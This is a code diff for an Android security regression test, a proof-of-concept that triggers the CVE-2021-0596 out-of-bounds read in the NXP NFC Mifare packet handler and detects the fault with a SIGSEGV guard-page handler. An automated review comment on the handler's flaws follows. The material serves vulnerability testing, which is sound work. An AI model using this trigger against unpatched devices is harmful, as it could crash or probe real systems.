Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp')
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp37
1 files changed, 33 insertions, 4 deletions
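diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
index 9b250044e38..3b1a58014a3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
@@ -15,21 +15,50 @@
 *
 */
+#include <unistd.h>
 #include "phNxpExtns_MifareStd.h"
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+char enable_selective_overload = ENABLE_NONE;
+char *vulnPtr = nullptr;
+bool testInProgress = false;
+struct sigaction new_action, old_action;
+void sigsegv_handler(int signum, siginfo_t *info, void* context) {
+ if (testInProgress && info->si_signo == SIGSEGV) {
+ size_t pageSize = getpagesize();
+ if (pageSize) {
+ char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) - pageSize;
+ char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK);
+ if (faultPage == vulnPtrGuardPage) {
+ (*old_action.sa_sigaction)(signum, info, context);
+ return;
+ }
+ }
+ }
+ _exit(EXIT_FAILURE);
+}
 uint8_t NFC_GetNCIVersion() {
 return NCI_VERSION_2_0;
 }
 int main() {
- uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t));
- if (buffer == nullptr) {
- return EXIT_FAILURE;
- }
+ sigemptyset(&new_action.sa_mask);
+ new_action.sa_flags = SA_SIGINFO;
+ new_action.sa_sigaction = sigsegv_handler;
+ sigaction(SIGSEGV, &new_action, &old_action);
+ enable_selective_overload = ENABLE_MEMALIGN_CHECK;
+ uint8_t *buffer = (uint8_t*) memalign(16, 16 * sizeof(uint8_t));
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ FAIL_CHECK(buffer);
+
+ vulnPtr = (char *) buffer;
 uint8_t bufferSize = 1;
 buffer[0] = 0x10;
 phNxpExtns_MfcModuleInit();
+ testInProgress = true;
 Mfc_RecvPacket(buffer, bufferSize);
+ testInProgress = false;
 free(buffer);
 return EXIT_SUCCESS;
 }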
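Review bot: `sigsegv_handler` calls `(*old_action.sa_sigaction)(signum, info, context)` without checking that the saved disposition has `SA_SIGINFO` set; when the prior disposition is `SIG_DFL` (the usual case at process start) `sa_sigaction` aliases `sa_handler` through a union, so the call goes through a null function pointer and relies on a second fault inside the handler rather than on the default action. Reinstating the old disposition and returning lets the kernel re-deliver the fault under it: `sigaction(SIGSEGV, &old_action, nullptr);` followed by `return;`. The guard-page arithmetic also mixes the runtime `getpagesize()` value with `PAGE_MASK`, which looks like a compile-time constant here; if the two ever disagree (a non-4K page size), `faultPage` never equals `vulnPtrGuardPage` and the handler exits with failure instead of attributing the fault, so deriving the mask from `pageSize` (`~(uintptr_t)(pageSize - 1)`, with `uintptr_t` rather than `size_t` for the pointer casts) keeps them consistent. Finally, the return of `sigaction(SIGSEGV, &new_action, &old_action)` in `main` is unchecked; on failure the test proceeds with no handler installed and `old_action` left unpopulated, so it should go through `FAIL_CHECK` like the allocation below it.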